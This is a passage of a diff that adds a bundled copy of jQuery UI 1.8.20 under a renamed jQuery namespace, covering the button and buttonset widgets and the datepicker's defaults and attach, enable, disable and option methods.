|
6877 |
+
var isDisabled = this.element.is( ":disabled" );
|
6878 |
+
if ( isDisabled !== this.options.disabled ) {
|
6879 |
+
this._setOption( "disabled", isDisabled );
|
6880 |
+
}
|
6881 |
+
if ( this.type === "radio" ) {
|
6882 |
+
radioGroup( this.element[0] ).each(function() {
|
6883 |
+
if ( $( this ).is( ":checked" ) ) {
|
6884 |
+
$( this ).button( "widget" )
|
6885 |
+
.addClass( "ui-state-active" )
|
6886 |
+
.attr( "aria-pressed", "true" );
|
6887 |
+
} else {
|
6888 |
+
$( this ).button( "widget" )
|
6889 |
+
.removeClass( "ui-state-active" )
|
6890 |
+
.attr( "aria-pressed", "false" );
|
6891 |
+
}
|
6892 |
+
});
|
6893 |
+
} else if ( this.type === "checkbox" ) {
|
6894 |
+
if ( this.element.is( ":checked" ) ) {
|
6895 |
+
this.buttonElement
|
6896 |
+
.addClass( "ui-state-active" )
|
6897 |
+
.attr( "aria-pressed", "true" );
|
6898 |
+
} else {
|
6899 |
+
this.buttonElement
|
6900 |
+
.removeClass( "ui-state-active" )
|
6901 |
+
.attr( "aria-pressed", "false" );
|
6902 |
+
}
|
6903 |
+
}
|
6904 |
+
},
|
6905 |
+
|
6906 |
+
_resetButton: function() {
|
6907 |
+
if ( this.type === "input" ) {
|
6908 |
+
if ( this.options.label ) {
|
6909 |
+
this.element.val( this.options.label );
|
6910 |
+
}
|
6911 |
+
return;
|
6912 |
+
}
|
6913 |
+
var buttonElement = this.buttonElement.removeClass( typeClasses ),
|
6914 |
+
buttonText = $( "<span></span>", this.element[0].ownerDocument )
|
6915 |
+
.addClass( "ui-button-text" )
|
6916 |
+
.html( this.options.label )
|
6917 |
+
.appendTo( buttonElement.empty() )
|
6918 |
+
.text(),
|
6919 |
+
icons = this.options.icons,
|
6920 |
+
multipleIcons = icons.primary && icons.secondary,
|
6921 |
+
buttonClasses = [];
|
6922 |
+
|
6923 |
+
if ( icons.primary || icons.secondary ) {
|
6924 |
+
if ( this.options.text ) {
|
6925 |
+
buttonClasses.push( "ui-button-text-icon" + ( multipleIcons ? "s" : ( icons.primary ? "-primary" : "-secondary" ) ) );
|
6926 |
+
}
|
6927 |
+
|
6928 |
+
if ( icons.primary ) {
|
6929 |
+
buttonElement.prepend( "<span class='ui-button-icon-primary ui-icon " + icons.primary + "'></span>" );
|
6930 |
+
}
|
6931 |
+
|
6932 |
+
if ( icons.secondary ) {
|
6933 |
+
buttonElement.append( "<span class='ui-button-icon-secondary ui-icon " + icons.secondary + "'></span>" );
|
6934 |
+
}
|
6935 |
+
|
6936 |
+
if ( !this.options.text ) {
|
6937 |
+
buttonClasses.push( multipleIcons ? "ui-button-icons-only" : "ui-button-icon-only" );
|
6938 |
+
|
6939 |
+
if ( !this.hasTitle ) {
|
6940 |
+
buttonElement.attr( "title", buttonText );
|
6941 |
+
}
|
6942 |
+
}
|
6943 |
+
} else {
|
6944 |
+
buttonClasses.push( "ui-button-text-only" );
|
6945 |
+
}
|
6946 |
+
buttonElement.addClass( buttonClasses.join( " " ) );
|
6947 |
+
}
|
6948 |
+
});
|
6949 |
+
|
6950 |
+
$.widget( "ui.buttonset", {
|
6951 |
+
options: {
|
6952 |
+
items: ":button, :submit, :reset, :checkbox, :radio, a, :data(button)"
|
6953 |
+
},
|
6954 |
+
|
6955 |
+
_create: function() {
|
6956 |
+
this.element.addClass( "ui-buttonset" );
|
6957 |
+
},
|
6958 |
+
|
6959 |
+
_init: function() {
|
6960 |
+
this.refresh();
|
6961 |
+
},
|
6962 |
+
|
6963 |
+
_setOption: function( key, value ) {
|
6964 |
+
if ( key === "disabled" ) {
|
6965 |
+
this.buttons.button( "option", key, value );
|
6966 |
+
}
|
6967 |
+
|
6968 |
+
$.Widget.prototype._setOption.apply( this, arguments );
|
6969 |
+
},
|
6970 |
+
|
6971 |
+
refresh: function() {
|
6972 |
+
var rtl = this.element.css( "direction" ) === "rtl";
|
6973 |
+
|
6974 |
+
this.buttons = this.element.find( this.options.items )
|
6975 |
+
.filter( ":ui-button" )
|
6976 |
+
.button( "refresh" )
|
6977 |
+
.end()
|
6978 |
+
.not( ":ui-button" )
|
6979 |
+
.button()
|
6980 |
+
.end()
|
6981 |
+
.map(function() {
|
6982 |
+
return $( this ).button( "widget" )[ 0 ];
|
6983 |
+
})
|
6984 |
+
.removeClass( "ui-corner-all ui-corner-left ui-corner-right" )
|
6985 |
+
.filter( ":first" )
|
6986 |
+
.addClass( rtl ? "ui-corner-right" : "ui-corner-left" )
|
6987 |
+
.end()
|
6988 |
+
.filter( ":last" )
|
6989 |
+
.addClass( rtl ? "ui-corner-left" : "ui-corner-right" )
|
6990 |
+
.end()
|
6991 |
+
.end();
|
6992 |
+
},
|
6993 |
+
|
6994 |
+
destroy: function() {
|
6995 |
+
this.element.removeClass( "ui-buttonset" );
|
6996 |
+
this.buttons
|
6997 |
+
.map(function() {
|
6998 |
+
return $( this ).button( "widget" )[ 0 ];
|
6999 |
+
})
|
7000 |
+
.removeClass( "ui-corner-left ui-corner-right" )
|
7001 |
+
.end()
|
7002 |
+
.button( "destroy" );
|
7003 |
+
|
7004 |
+
$.Widget.prototype.destroy.call( this );
|
7005 |
+
}
|
7006 |
+
});
|
7007 |
+
|
7008 |
+
}(asljQuery) );
|
7009 |
+
|
7010 |
+
(function( $, undefined ) {
|
7011 |
+
|
7012 |
+
$.extend($.ui, { datepicker: { version: "1.8.20" } });
|
7013 |
+
|
7014 |
+
var PROP_NAME = 'datepicker';
|
7015 |
+
var dpuuid = new Date().getTime();
|
7016 |
+
var instActive;
|
7017 |
+
|
7018 |
+
/* Date picker manager.
|
7019 |
+
Use the singleton instance of this class, $.datepicker, to interact with the date picker.
|
7020 |
+
Settings for (groups of) date pickers are maintained in an instance object,
|
7021 |
+
allowing multiple different settings on the same page. */
|
7022 |
+
|
7023 |
+
function Datepicker() {
|
7024 |
+
this.debug = false; // Change this to true to start debugging
|
7025 |
+
this._curInst = null; // The current instance in use
|
7026 |
+
this._keyEvent = false; // If the last event was a key event
|
7027 |
+
this._disabledInputs = []; // List of date picker inputs that have been disabled
|
7028 |
+
this._datepickerShowing = false; // True if the popup picker is showing , false if not
|
7029 |
+
this._inDialog = false; // True if showing within a "dialog", false if not
|
7030 |
+
this._mainDivId = 'ui-datepicker-div'; // The ID of the main datepicker division
|
7031 |
+
this._inlineClass = 'ui-datepicker-inline'; // The name of the inline marker class
|
7032 |
+
this._appendClass = 'ui-datepicker-append'; // The name of the append marker class
|
7033 |
+
this._triggerClass = 'ui-datepicker-trigger'; // The name of the trigger marker class
|
7034 |
+
this._dialogClass = 'ui-datepicker-dialog'; // The name of the dialog marker class
|
7035 |
+
this._disableClass = 'ui-datepicker-disabled'; // The name of the disabled covering marker class
|
7036 |
+
this._unselectableClass = 'ui-datepicker-unselectable'; // The name of the unselectable cell marker class
|
7037 |
+
this._currentClass = 'ui-datepicker-current-day'; // The name of the current day marker class
|
7038 |
+
this._dayOverClass = 'ui-datepicker-days-cell-over'; // The name of the day hover marker class
|
7039 |
+
this.regional = []; // Available regional settings, indexed by language code
|
7040 |
+
this.regional[''] = { // Default regional settings
|
7041 |
+
closeText: 'Done', // Display text for close link
|
7042 |
+
prevText: 'Prev', // Display text for previous month link
|
7043 |
+
nextText: 'Next', // Display text for next month link
|
7044 |
+
currentText: 'Today', // Display text for current month link
|
7045 |
+
monthNames: ['January','February','March','April','May','June',
|
7046 |
+
'July','August','September','October','November','December'], // Names of months for drop-down and formatting
|
7047 |
+
monthNamesShort: ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'], // For formatting
|
7048 |
+
dayNames: ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'], // For formatting
|
7049 |
+
dayNamesShort: ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat'], // For formatting
|
7050 |
+
dayNamesMin: ['Su','Mo','Tu','We','Th','Fr','Sa'], // Column headings for days starting at Sunday
|
7051 |
+
weekHeader: 'Wk', // Column header for week of the year
|
7052 |
+
dateFormat: 'mm/dd/yy', // See format options on parseDate
|
7053 |
+
firstDay: 0, // The first day of the week, Sun = 0, Mon = 1, ...
|
7054 |
+
isRTL: false, // True if right-to-left language, false if left-to-right
|
7055 |
+
showMonthAfterYear: false, // True if the year select precedes month, false for month then year
|
7056 |
+
yearSuffix: '' // Additional text to append to the year in the month headers
|
7057 |
+
};
|
7058 |
+
this._defaults = { // Global defaults for all the date picker instances
|
7059 |
+
showOn: 'focus', // 'focus' for popup on focus,
|
7060 |
+
// 'button' for trigger button, or 'both' for either
|
7061 |
+
showAnim: 'fadeIn', // Name of jQuery animation for popup
|
7062 |
+
showOptions: {}, // Options for enhanced animations
|
7063 |
+
defaultDate: null, // Used when field is blank: actual date,
|
7064 |
+
// +/-number for offset from today, null for today
|
7065 |
+
appendText: '', // Display text following the input box, e.g. showing the format
|
7066 |
+
buttonText: '...', // Text for trigger button
|
7067 |
+
buttonImage: '', // URL for trigger button image
|
7068 |
+
buttonImageOnly: false, // True if the image appears alone, false if it appears on a button
|
7069 |
+
hideIfNoPrevNext: false, // True to hide next/previous month links
|
7070 |
+
// if not applicable, false to just disable them
|
7071 |
+
navigationAsDateFormat: false, // True if date formatting applied to prev/today/next links
|
7072 |
+
gotoCurrent: false, // True if today link goes back to current selection instead
|
7073 |
+
changeMonth: false, // True if month can be selected directly, false if only prev/next
|
7074 |
+
changeYear: false, // True if year can be selected directly, false if only prev/next
|
7075 |
+
yearRange: 'c-10:c+10', // Range of years to display in drop-down,
|
7076 |
+
// either relative to today's year (-nn:+nn), relative to currently displayed year
|
7077 |
+
// (c-nn:c+nn), absolute (nnnn:nnnn), or a combination of the above (nnnn:-n)
|
7078 |
+
showOtherMonths: false, // True to show dates in other months, false to leave blank
|
7079 |
+
selectOtherMonths: false, // True to allow selection of dates in other months, false for unselectable
|
7080 |
+
showWeek: false, // True to show week of the year, false to not show it
|
7081 |
+
calculateWeek: this.iso8601Week, // How to calculate the week of the year,
|
7082 |
+
// takes a Date and returns the number of the week for it
|
7083 |
+
shortYearCutoff: '+10', // Short year values < this are in the current century,
|
7084 |
+
// > this are in the previous century,
|
7085 |
+
// string value starting with '+' for current year + value
|
7086 |
+
minDate: null, // The earliest selectable date, or null for no limit
|
7087 |
+
maxDate: null, // The latest selectable date, or null for no limit
|
7088 |
+
duration: 'fast', // Duration of display/closure
|
7089 |
+
beforeShowDay: null, // Function that takes a date and returns an array with
|
7090 |
+
// [0] = true if selectable, false if not, [1] = custom CSS class name(s) or '',
|
7091 |
+
// [2] = cell title (optional), e.g. $.datepicker.noWeekends
|
7092 |
+
beforeShow: null, // Function that takes an input field and
|
7093 |
+
// returns a set of custom settings for the date picker
|
7094 |
+
onSelect: null, // Define a callback function when a date is selected
|
7095 |
+
onChangeMonthYear: null, // Define a callback function when the month or year is changed
|
7096 |
+
onClose: null, // Define a callback function when the datepicker is closed
|
7097 |
+
numberOfMonths: 1, // Number of months to show at a time
|
7098 |
+
showCurrentAtPos: 0, // The position in multipe months at which to show the current month (starting at 0)
|
7099 |
+
stepMonths: 1, // Number of months to step back/forward
|
7100 |
+
stepBigMonths: 12, // Number of months to step back/forward for the big links
|
7101 |
+
altField: '', // Selector for an alternate field to store selected dates into
|
7102 |
+
altFormat: '', // The date format to use for the alternate field
|
7103 |
+
constrainInput: true, // The input is constrained by the current date format
|
7104 |
+
showButtonPanel: false, // True to show button panel, false to not show it
|
7105 |
+
autoSize: false, // True to size the input for the date format, false to leave as is
|
7106 |
+
disabled: false // The initial disabled state
|
7107 |
+
};
|
7108 |
+
$.extend(this._defaults, this.regional['']);
|
7109 |
+
this.dpDiv = bindHover($('<div id="' + this._mainDivId + '" class="ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all"></div>'));
|
7110 |
+
}
|
7111 |
+
|
7112 |
+
$.extend(Datepicker.prototype, {
|
7113 |
+
/* Class name added to elements to indicate already configured with a date picker. */
|
7114 |
+
markerClassName: 'hasDatepicker',
|
7115 |
+
|
7116 |
+
//Keep track of the maximum number of rows displayed (see #7043)
|
7117 |
+
maxRows: 4,
|
7118 |
+
|
7119 |
+
/* Debug logging (if enabled). */
|
7120 |
+
log: function () {
|
7121 |
+
if (this.debug)
|
7122 |
+
console.log.apply('', arguments);
|
7123 |
+
},
|
7124 |
+
|
7125 |
+
// TODO rename to "widget" when switching to widget factory
|
7126 |
+
_widgetDatepicker: function() {
|
7127 |
+
return this.dpDiv;
|
7128 |
+
},
|
7129 |
+
|
7130 |
+
/* Override the default settings for all instances of the date picker.
|
7131 |
+
@param settings object - the new settings to use as defaults (anonymous object)
|
7132 |
+
@return the manager object */
|
7133 |
+
setDefaults: function(settings) {
|
7134 |
+
extendRemove(this._defaults, settings || {});
|
7135 |
+
return this;
|
7136 |
+
},
|
7137 |
+
|
7138 |
+
/* Attach the date picker to a jQuery selection.
|
7139 |
+
@param target element - the target input field or division or span
|
7140 |
+
@param settings object - the new settings to use for this date picker instance (anonymous) */
|
7141 |
+
_attachDatepicker: function(target, settings) {
|
7142 |
+
// check for settings on the control itself - in namespace 'date:'
|
7143 |
+
var inlineSettings = null;
|
7144 |
+
for (var attrName in this._defaults) {
|
7145 |
+
var attrValue = target.getAttribute('date:' + attrName);
|
7146 |
+
if (attrValue) {
|
7147 |
+
inlineSettings = inlineSettings || {};
|
7148 |
+
try {
|
7149 |
+
inlineSettings[attrName] = eval(attrValue);
|
7150 |
+
} catch (err) {
|
7151 |
+
inlineSettings[attrName] = attrValue;
|
7152 |
+
}
|
7153 |
+
}
|
7154 |
+
}
|
7155 |
+
var nodeName = target.nodeName.toLowerCase();
|
7156 |
+
var inline = (nodeName == 'div' || nodeName == 'span');
|
7157 |
+
if (!target.id) {
|
7158 |
+
this.uuid += 1;
|
7159 |
+
target.id = 'dp' + this.uuid;
|
7160 |
+
}
|
7161 |
+
var inst = this._newInst($(target), inline);
|
7162 |
+
inst.settings = $.extend({}, settings || {}, inlineSettings || {});
|
7163 |
+
if (nodeName == 'input') {
|
7164 |
+
this._connectDatepicker(target, inst);
|
7165 |
+
} else if (inline) {
|
7166 |
+
this._inlineDatepicker(target, inst);
|
7167 |
+
}
|
7168 |
+
},
|
7169 |
+
|
7170 |
+
/* Create a new instance object. */
|
7171 |
+
_newInst: function(target, inline) {
|
7172 |
+
var id = target[0].id.replace(/([^A-Za-z0-9_-])/g, '\\\\$1'); // escape jQuery meta chars
|
7173 |
+
return {id: id, input: target, // associated target
|
7174 |
+
selectedDay: 0, selectedMonth: 0, selectedYear: 0, // current selection
|
7175 |
+
drawMonth: 0, drawYear: 0, // month being drawn
|
7176 |
+
inline: inline, // is datepicker inline or not
|
7177 |
+
dpDiv: (!inline ? this.dpDiv : // presentation div
|
7178 |
+
bindHover($('<div class="' + this._inlineClass + ' ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all"></div>')))};
|
7179 |
+
},
|
7180 |
+
|
7181 |
+
/* Attach the date picker to an input field. */
|
7182 |
+
_connectDatepicker: function(target, inst) {
|
7183 |
+
var input = $(target);
|
7184 |
+
inst.append = $([]);
|
7185 |
+
inst.trigger = $([]);
|
7186 |
+
if (input.hasClass(this.markerClassName))
|
7187 |
+
return;
|
7188 |
+
this._attachments(input, inst);
|
7189 |
+
input.addClass(this.markerClassName).keydown(this._doKeyDown).
|
7190 |
+
keypress(this._doKeyPress).keyup(this._doKeyUp).
|
7191 |
+
bind("setData.datepicker", function(event, key, value) {
|
7192 |
+
inst.settings[key] = value;
|
7193 |
+
}).bind("getData.datepicker", function(event, key) {
|
7194 |
+
return this._get(inst, key);
|
7195 |
+
});
|
7196 |
+
this._autoSize(inst);
|
7197 |
+
$.data(target, PROP_NAME, inst);
|
7198 |
+
//If disabled option is true, disable the datepicker once it has been attached to the input (see ticket #5665)
|
7199 |
+
if( inst.settings.disabled ) {
|
7200 |
+
this._disableDatepicker( target );
|
7201 |
+
}
|
7202 |
+
},
|
7203 |
+
|
7204 |
+
/* Make attachments based on settings. */
|
7205 |
+
_attachments: function(input, inst) {
|
7206 |
+
var appendText = this._get(inst, 'appendText');
|
7207 |
+
var isRTL = this._get(inst, 'isRTL');
|
7208 |
+
if (inst.append)
|
7209 |
+
inst.append.remove();
|
7210 |
+
if (appendText) {
|
7211 |
+
inst.append = $('<span class="' + this._appendClass + '">' + appendText + '</span>');
|
7212 |
+
input[isRTL ? 'before' : 'after'](inst.append);
|
7213 |
+
}
|
7214 |
+
input.unbind('focus', this._showDatepicker);
|
7215 |
+
if (inst.trigger)
|
7216 |
+
inst.trigger.remove();
|
7217 |
+
var showOn = this._get(inst, 'showOn');
|
7218 |
+
if (showOn == 'focus' || showOn == 'both') // pop-up date picker when in the marked field
|
7219 |
+
input.focus(this._showDatepicker);
|
7220 |
+
if (showOn == 'button' || showOn == 'both') { // pop-up date picker when button clicked
|
7221 |
+
var buttonText = this._get(inst, 'buttonText');
|
7222 |
+
var buttonImage = this._get(inst, 'buttonImage');
|
7223 |
+
inst.trigger = $(this._get(inst, 'buttonImageOnly') ?
|
7224 |
+
$('<img/>').addClass(this._triggerClass).
|
7225 |
+
attr({ src: buttonImage, alt: buttonText, title: buttonText }) :
|
7226 |
+
$('<button type="button"></button>').addClass(this._triggerClass).
|
7227 |
+
html(buttonImage == '' ? buttonText : $('<img/>').attr(
|
7228 |
+
{ src:buttonImage, alt:buttonText, title:buttonText })));
|
7229 |
+
input[isRTL ? 'before' : 'after'](inst.trigger);
|
7230 |
+
inst.trigger.click(function() {
|
7231 |
+
if ($.datepicker._datepickerShowing && $.datepicker._lastInput == input[0])
|
7232 |
+
$.datepicker._hideDatepicker();
|
7233 |
+
else if ($.datepicker._datepickerShowing && $.datepicker._lastInput != input[0]) {
|
7234 |
+
$.datepicker._hideDatepicker();
|
7235 |
+
$.datepicker._showDatepicker(input[0]);
|
7236 |
+
} else
|
7237 |
+
$.datepicker._showDatepicker(input[0]);
|
7238 |
+
return false;
|
7239 |
+
});
|
7240 |
+
}
|
7241 |
+
},
|
7242 |
+
|
7243 |
+
/* Apply the maximum length for the date format. */
|
7244 |
+
_autoSize: function(inst) {
|
7245 |
+
if (this._get(inst, 'autoSize') && !inst.inline) {
|
7246 |
+
var date = new Date(2009, 12 - 1, 20); // Ensure double digits
|
7247 |
+
var dateFormat = this._get(inst, 'dateFormat');
|
7248 |
+
if (dateFormat.match(/[DM]/)) {
|
7249 |
+
var findMax = function(names) {
|
7250 |
+
var max = 0;
|
7251 |
+
var maxI = 0;
|
7252 |
+
for (var i = 0; i < names.length; i++) {
|
7253 |
+
if (names[i].length > max) {
|
7254 |
+
max = names[i].length;
|
7255 |
+
maxI = i;
|
7256 |
+
}
|
7257 |
+
}
|
7258 |
+
return maxI;
|
7259 |
+
};
|
7260 |
+
date.setMonth(findMax(this._get(inst, (dateFormat.match(/MM/) ?
|
7261 |
+
'monthNames' : 'monthNamesShort'))));
|
7262 |
+
date.setDate(findMax(this._get(inst, (dateFormat.match(/DD/) ?
|
7263 |
+
'dayNames' : 'dayNamesShort'))) + 20 - date.getDay());
|
7264 |
+
}
|
7265 |
+
inst.input.attr('size', this._formatDate(inst, date).length);
|
7266 |
+
}
|
7267 |
+
},
|
7268 |
+
|
7269 |
+
/* Attach an inline date picker to a div. */
|
7270 |
+
_inlineDatepicker: function(target, inst) {
|
7271 |
+
var divSpan = $(target);
|
7272 |
+
if (divSpan.hasClass(this.markerClassName))
|
7273 |
+
return;
|
7274 |
+
divSpan.addClass(this.markerClassName).append(inst.dpDiv).
|
7275 |
+
bind("setData.datepicker", function(event, key, value){
|
7276 |
+
inst.settings[key] = value;
|
7277 |
+
}).bind("getData.datepicker", function(event, key){
|
7278 |
+
return this._get(inst, key);
|
7279 |
+
});
|
7280 |
+
$.data(target, PROP_NAME, inst);
|
7281 |
+
this._setDate(inst, this._getDefaultDate(inst), true);
|
7282 |
+
this._updateDatepicker(inst);
|
7283 |
+
this._updateAlternate(inst);
|
7284 |
+
//If disabled option is true, disable the datepicker before showing it (see ticket #5665)
|
7285 |
+
if( inst.settings.disabled ) {
|
7286 |
+
this._disableDatepicker( target );
|
7287 |
+
}
|
7288 |
+
// Set display:block in place of inst.dpDiv.show() which won't work on disconnected elements
|
7289 |
+
// http://bugs.jqueryui.com/ticket/7552 - A Datepicker created on a detached div has zero height
|
7290 |
+
inst.dpDiv.css( "display", "block" );
|
7291 |
+
},
|
7292 |
+
|
7293 |
+
/* Pop-up the date picker in a "dialog" box.
|
7294 |
+
@param input element - ignored
|
7295 |
+
@param date string or Date - the initial date to display
|
7296 |
+
@param onSelect function - the function to call when a date is selected
|
7297 |
+
@param settings object - update the dialog date picker instance's settings (anonymous object)
|
7298 |
+
@param pos int[2] - coordinates for the dialog's position within the screen or
|
7299 |
+
event - with x/y coordinates or
|
7300 |
+
leave empty for default (screen centre)
|
7301 |
+
@return the manager object */
|
7302 |
+
_dialogDatepicker: function(input, date, onSelect, settings, pos) {
|
7303 |
+
var inst = this._dialogInst; // internal instance
|
7304 |
+
if (!inst) {
|
7305 |
+
this.uuid += 1;
|
7306 |
+
var id = 'dp' + this.uuid;
|
7307 |
+
this._dialogInput = $('<input type="text" id="' + id +
|
7308 |
+
'" style="position: absolute; top: -100px; width: 0px; z-index: -10;"/>');
|
7309 |
+
this._dialogInput.keydown(this._doKeyDown);
|
7310 |
+
$('body').append(this._dialogInput);
|
7311 |
+
inst = this._dialogInst = this._newInst(this._dialogInput, false);
|
7312 |
+
inst.settings = {};
|
7313 |
+
$.data(this._dialogInput[0], PROP_NAME, inst);
|
7314 |
+
}
|
7315 |
+
extendRemove(inst.settings, settings || {});
|
7316 |
+
date = (date && date.constructor == Date ? this._formatDate(inst, date) : date);
|
7317 |
+
this._dialogInput.val(date);
|
7318 |
+
|
7319 |
+
this._pos = (pos ? (pos.length ? pos : [pos.pageX, pos.pageY]) : null);
|
7320 |
+
if (!this._pos) {
|
7321 |
+
var browserWidth = document.documentElement.clientWidth;
|
7322 |
+
var browserHeight = document.documentElement.clientHeight;
|
7323 |
+
var scrollX = document.documentElement.scrollLeft || document.body.scrollLeft;
|
7324 |
+
var scrollY = document.documentElement.scrollTop || document.body.scrollTop;
|
7325 |
+
this._pos = // should use actual width/height below
|
7326 |
+
[(browserWidth / 2) - 100 + scrollX, (browserHeight / 2) - 150 + scrollY];
|
7327 |
+
}
|
7328 |
+
|
7329 |
+
// move input on screen for focus, but hidden behind dialog
|
7330 |
+
this._dialogInput.css('left', (this._pos[0] + 20) + 'px').css('top', this._pos[1] + 'px');
|
7331 |
+
inst.settings.onSelect = onSelect;
|
7332 |
+
this._inDialog = true;
|
7333 |
+
this.dpDiv.addClass(this._dialogClass);
|
7334 |
+
this._showDatepicker(this._dialogInput[0]);
|
7335 |
+
if ($.blockUI)
|
7336 |
+
$.blockUI(this.dpDiv);
|
7337 |
+
$.data(this._dialogInput[0], PROP_NAME, inst);
|
7338 |
+
return this;
|
7339 |
+
},
|
7340 |
+
|
7341 |
+
/* Detach a datepicker from its control.
|
7342 |
+
@param target element - the target input field or division or span */
|
7343 |
+
_destroyDatepicker: function(target) {
|
7344 |
+
var $target = $(target);
|
7345 |
+
var inst = $.data(target, PROP_NAME);
|
7346 |
+
if (!$target.hasClass(this.markerClassName)) {
|
7347 |
+
return;
|
7348 |
+
}
|
7349 |
+
var nodeName = target.nodeName.toLowerCase();
|
7350 |
+
$.removeData(target, PROP_NAME);
|
7351 |
+
if (nodeName == 'input') {
|
7352 |
+
inst.append.remove();
|
7353 |
+
inst.trigger.remove();
|
7354 |
+
$target.removeClass(this.markerClassName).
|
7355 |
+
unbind('focus', this._showDatepicker).
|
7356 |
+
unbind('keydown', this._doKeyDown).
|
7357 |
+
unbind('keypress', this._doKeyPress).
|
7358 |
+
unbind('keyup', this._doKeyUp);
|
7359 |
+
} else if (nodeName == 'div' || nodeName == 'span')
|
7360 |
+
$target.removeClass(this.markerClassName).empty();
|
7361 |
+
},
|
7362 |
+
|
7363 |
+
/* Enable the date picker to a jQuery selection.
|
7364 |
+
@param target element - the target input field or division or span */
|
7365 |
+
_enableDatepicker: function(target) {
|
7366 |
+
var $target = $(target);
|
7367 |
+
var inst = $.data(target, PROP_NAME);
|
7368 |
+
if (!$target.hasClass(this.markerClassName)) {
|
7369 |
+
return;
|
7370 |
+
}
|
7371 |
+
var nodeName = target.nodeName.toLowerCase();
|
7372 |
+
if (nodeName == 'input') {
|
7373 |
+
target.disabled = false;
|
7374 |
+
inst.trigger.filter('button').
|
7375 |
+
each(function() { this.disabled = false; }).end().
|
7376 |
+
filter('img').css({opacity: '1.0', cursor: ''});
|
7377 |
+
}
|
7378 |
+
else if (nodeName == 'div' || nodeName == 'span') {
|
7379 |
+
var inline = $target.children('.' + this._inlineClass);
|
7380 |
+
inline.children().removeClass('ui-state-disabled');
|
7381 |
+
inline.find("select.ui-datepicker-month, select.ui-datepicker-year").
|
7382 |
+
removeAttr("disabled");
|
7383 |
+
}
|
7384 |
+
this._disabledInputs = $.map(this._disabledInputs,
|
7385 |
+
function(value) { return (value == target ? null : value); }); // delete entry
|
7386 |
+
},
|
7387 |
+
|
7388 |
+
/* Disable the date picker to a jQuery selection.
|
7389 |
+
@param target element - the target input field or division or span */
|
7390 |
+
_disableDatepicker: function(target) {
|
7391 |
+
var $target = $(target);
|
7392 |
+
var inst = $.data(target, PROP_NAME);
|
7393 |
+
if (!$target.hasClass(this.markerClassName)) {
|
7394 |
+
return;
|
7395 |
+
}
|
7396 |
+
var nodeName = target.nodeName.toLowerCase();
|
7397 |
+
if (nodeName == 'input') {
|
7398 |
+
target.disabled = true;
|
7399 |
+
inst.trigger.filter('button').
|
7400 |
+
each(function() { this.disabled = true; }).end().
|
7401 |
+
filter('img').css({opacity: '0.5', cursor: 'default'});
|
7402 |
+
}
|
7403 |
+
else if (nodeName == 'div' || nodeName == 'span') {
|
7404 |
+
var inline = $target.children('.' + this._inlineClass);
|
7405 |
+
inline.children().addClass('ui-state-disabled');
|
7406 |
+
inline.find("select.ui-datepicker-month, select.ui-datepicker-year").
|
7407 |
+
attr("disabled", "disabled");
|
7408 |
+
}
|
7409 |
+
this._disabledInputs = $.map(this._disabledInputs,
|
7410 |
+
function(value) { return (value == target ? null : value); }); // delete entry
|
7411 |
+
this._disabledInputs[this._disabledInputs.length] = target;
|
7412 |
+
},
|
7413 |
+
|
7414 |
+
/* Is the first field in a jQuery collection disabled as a datepicker?
|
7415 |
+
@param target element - the target input field or division or span
|
7416 |
+
@return boolean - true if disabled, false if enabled */
|
7417 |
+
_isDisabledDatepicker: function(target) {
|
7418 |
+
if (!target) {
|
7419 |
+
return false;
|
7420 |
+
}
|
7421 |
+
for (var i = 0; i < this._disabledInputs.length; i++) {
|
7422 |
+
if (this._disabledInputs[i] == target)
|
7423 |
+
return true;
|
7424 |
+
}
|
7425 |
+
return false;
|
7426 |
+
},
|
7427 |
+
|
7428 |
+
/* Retrieve the instance data for the target control.
|
7429 |
+
@param target element - the target input field or division or span
|
7430 |
+
@return object - the associated instance data
|
7431 |
+
@throws error if a jQuery problem getting data */
|
7432 |
+
_getInst: function(target) {
|
7433 |
+
try {
|
7434 |
+
return $.data(target, PROP_NAME);
|
7435 |
+
}
|
7436 |
+
catch (err) {
|
7437 |
+
throw 'Missing instance data for this datepicker';
|
7438 |
+
}
|
7439 |
+
},
|
7440 |
+
|
7441 |
+
/* Update or retrieve the settings for a date picker attached to an input field or division.
|
7442 |
+
@param target element - the target input field or division or span
|
7443 |
+
@param name object - the new settings to update or
|
7444 |
+
string - the name of the setting to change or retrieve,
|
7445 |
+
when retrieving also 'all' for all instance settings or
|
7446 |
+
'defaults' for all global defaults
|
7447 |
+
@param value any - the new value for the setting
|
7448 |
+
(omit if above is an object or to retrieve a value) */
|
7449 |
+
_optionDatepicker: function(target, name, value) {
|
7450 |
+
var inst = this._getInst(target);
|
7451 |
+
if (arguments.length == 2 && typeof name == 'string') {
|
7452 |
+
return (name == 'defaults' ? $.extend({}, $.datepicker._defaults) :
|
7453 |
+
(inst ? (name == 'all' ? $.extend({}, inst.settings) :
|
7454 |
+
this._get(inst, name)) : null));
|
7455 |
+
}
|
7456 |
+
var settings = name || {};
|
7457 |
+
if (typeof name == 'string') {
|
7458 |
+
settings = {};
|
7459 |
+
settings[name] = value;
|
7460 |
+
}
|
7461 |
+
if (inst) {
|
7462 |
+
if (this._curInst == inst) {
|
7463 |
+
this._hideDatepicker();
|
7464 |
+
}
|
7465 |
+
var date = this._getDateDatepicker(target, true);
|
7466 |
+
var minDate = this._getMinMaxDate(inst, 'min');
|
7467 |
+
var maxDate = this._getMinMaxDate(inst, 'max');
|
7468 |
+
extendRemove(inst.settings, settings);
|
7469 |
+
// reformat the old minDate/maxDate values if dateFormat changes and a new minDate/maxDate isn't provided
|
7470 |
+
if (minDate !== null && settings['dateFormat'] !== undefined && settings['minDate'] === undefined)
|
7471 |
+
inst.settings.minDate = this._formatDate(inst, minDate);
|
7472 |
+
if (maxDate !== null && settings['dateFormat'] !== undefined && settings['maxDate'] === undefined)
|
7473 |
+
inst.settings.maxDate = this._formatDate(inst, maxDate);
|
7474 |
+
this._attachments($(target), inst);
|
7475 |
+
this._autoSize(inst);
|
7476 |
+
this._setDate(inst, date);
|
7477 |
+
this._updateAlternate(inst);
|
7478 |
+
this._updateDatepicker(inst);
|
7479 |
+
}
|
7480 |
+
},
|
7481 |
+
|
7482 |
+
// change method deprecated
|
7483 |
+
_changeDatepicker: function(target, name, value) {
|
7484 |
+
this._optionDatepicker(target, name, value);
|
7485 |
+
},
|
